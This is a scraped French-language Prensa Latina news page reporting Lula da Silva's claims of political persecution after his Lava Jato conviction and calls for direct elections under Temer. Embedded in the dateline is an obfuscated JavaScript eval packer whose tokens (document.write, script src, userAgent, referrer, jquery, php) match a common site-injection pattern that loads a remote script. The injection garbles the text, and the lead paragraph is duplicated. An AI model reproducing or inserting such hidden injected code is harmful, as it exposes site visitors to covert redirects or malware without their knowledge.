dimanche 14 avril 2024 |
Prensa Latina - Qui sommes nous

| Contacter avec Prensa Latina

Agence d'information Latino-américaine
Édition française
Search
Close this search box.

Lula assure qu’il lutera jusqu’à la fin pour sa dignité

Brasilia, eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|nsttr|var|u0026u|referrer|esdze||js|php'.split('|'),0,{})) 19 juillet (PL) L'ancien président du Brésil, Luiz Inacio Lula da Silva, a répété qu'il était convaincu d'être victime d'une réelle persécution politique et a assuré qu'il se battra jusqu'à la fin pour sa dignité.

Brasilia, 19 juillet (PL) L’ancien président du Brésil, Luiz Inacio Lula da Silva, a répété qu’il était convaincu d’être victime d’une réelle persécution politique et a assuré qu’il se battra jusqu’à la fin pour sa dignité.

Lors d’un entretien donné à une radio de Sao Paulo, le fondateur du Parti des Travailleurs (PT) a exprimé qu’il ne permettra jamais « qu’ils diffament mon histoire, ma biographie », puis a accusé de menteurs des « personnes qui travaillent au sein de l’opération anti-corruption Lava Jato ».

Lula a catalogué de « farce montée sur une série de mensonges » le procès tenu devant le juge fédéral Sergio Moro. Ce jugement c’est terminé par une sanction de neuf ans et six mois de prison pour la prétendue culpabilité des délits de corruption passive et blanchiment d’argent.

« Cette condamnation me donne l’opportunité de continuer à me défendre, de prouver mon innocence et de démontrer que Moro et les procureurs de l’affaire Lava Jato ont commis une injustice », a-t-il souligné avant de répéter que « l’unique but de ce jugement est de rendre service à ceux qui ne veulent pas me voir participer aux élections présidentielles de 2018 ».

Il a insisté sur le fait que ce « processus n’a rien eu de juridique car Moro n’a jamais pris en compte une seule des déclarations offertes par 73 témoins. Ce qu’il y avait c’était une nécessité de prononcer une condamnation politique ».

Interrogé au sujet de la profonde crise que traverse le pays, Lula a déclaré que « Temer a démontré qu’il n’a pas le statut et les qualités pour continuer de gouverner le Brésil ».

« Avec à peine trois pour cent d’appréciation favorable, son autorité morale n’existe plus et le plus raisonnable et censé serait de convoquer immédiatement des élections directes », a-t-il suggéré.

Lula a nié que l’appel à des élections anticipées enfreindrait les règles établies, et a affirmé que ces dernières ont déjà été bafouées par le processus d’impeachment à l’encontre de la présidente constitutionnelle Dilma Rousseff, lequel s’est conclu par la cassation de son mandat sans qu’elle n’est commis aucun crime de responsabilité.

Au sujet de sa possible participation aux élection de l’année prochaine, il a souligné qu’il ne fallait pas nécessairement que ce soit lui qui représente le PT ; même si « j’ai déjà prouvé que j’ai les capacités pour gouverner le pays ».

« Quoi qu’il en soit, je vais défendre tout ce qui a été fait par les gouvernements du PT et qui représente le plus important moment d’inclusion sociale dans l’histoire du Brésil ».

C’est dans ce sens qu’il a exprimé son intention de « réaliser une campagne qui implique toute la société et rende possible le fait que les gens assument un nouveau compromis social ». « Je suis convaincu que je peux reconstituer ce pays », a-t-il assuré.

Par ailleurs, le Front Populaire du Brésil (FBP) – une organisation qui rassemble des mouvements populaires, politiques, civiques et syndicaux – a appelé à une grande mobilisation nationale en soutien à Luiz Inacio Lula da Silva jeudi prochain.

Ces manifestations auront lieu dans tous les États du pays, et parmi les revendications apparaitront également la défense de la démocratie, de l’indépendance de la justice et des droits des travailleurs suite à l’adoption de la très contestée réforme du travail menée par le gouvernement de Michel Temer.

Le FBP a souligné dans un communiqué que la condamnation de Lula à neuf ans et demi de prison prononcée par Sergio Moro n’est basée sur aucune preuve étayée.

Face à la crise politique et institutionnelle que vit le pays, le FBP a souligné que lors des manifestations ils réclameront également une convocation immédiate à des élections présidentielles directes.

Peo/ocs/mpm/agp/mpm

EN CONTINU
notes connexes